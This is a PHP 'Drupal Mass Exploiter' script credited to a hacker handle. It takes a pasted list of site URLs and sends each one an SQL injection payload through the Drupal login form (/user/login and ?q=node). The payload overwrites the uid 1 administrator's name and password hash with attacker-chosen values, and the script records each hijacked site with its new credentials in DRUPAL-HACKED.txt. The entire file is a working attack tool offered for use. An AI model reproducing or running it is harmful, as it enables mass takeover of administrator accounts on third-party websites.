drupal Mass Exploiter

1. <b>.:: Drupal Mass Exploiter Developed By Magico ::.</b><br>
2. <b>.:: https://www.facebook.com/magico.sec ::.</b>
3. <?php
4. echo'<form method="POST" action="">
5. <textarea name="urls" cols="50" rows="16" placeholder="http://www.site.com/" ></textarea><br>
6. <input type="submit" name="submit" value="submit">
7. </form>
8. ';
9. $urls = $_POST['urls'];
10. $sites = explode("\r\n",$urls);
11. foreach($sites as $url){
12. $url =trim($url);
13.  
14. $file = fopen("DRUPAL-HACKED.txt", "a");
15. error_reporting(0);
16. if (isset($_POST['submit'])) {
17.     //$url = $_POST['url'];
18.     $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
19.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
20. ", 'content' => $post_data));
21.     $ctx = stream_context_create($params);
22.     $data = file_get_contents($url . '/user/login/', null, $ctx);
23.     echo "<h4>Scanning at \"/user/login/</h4>\"";
24.     if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
25.         $fp = fopen("DRUPAL-HACKED.txt", 'a');
26.         echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
27.         echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
28.         echo "<br>---------------------------------------------------------------------------------------<br>";
29.         fwrite($fp, "Succes! User:anonghost Pass:admin -> {$url}/user/login");
30.         fwrite($fp, "
31. ");
32.         fwrite($fp, "======================================Magico==========================================================");
33.         fwrite($fp, "
34. ");
35.         fclose($fp);
36.     } else {
37.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
38.     }
39. }
40. if (isset($_POST['submit'])) {
41.     //$url = "http://" . $_GET['url'] . "/";
42.     $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
43.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
44. ", 'content' => $post_data));
45.     $ctx = stream_context_create($params);
46.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
47.     echo "<h4>Scanning at \"Index</h4>\"";
48.     if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
49.         $fp = fopen("DRUPAL-HACKED.txt", 'a');
50.         echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
51.         echo '<font color="#00FF66">Finished scanning. check =>  </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
52.         echo "<br>======================================================================================<br>";
53.         fwrite($fp, "Success! User:anonghost Pass:admin -> {$url}/user/login");
54.         fwrite($fp, "
55. ");
56.         fwrite($fp, "======================================Magico===========================================================");
57.         fwrite($fp, "
58. ");
59.         fclose($fp);
60.     } else {
61.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
62.         echo "<br>======================================================================================<br>";
63.     }
64. }
65. //==========
66. }// end foreach
67.  
68.  
69. ?>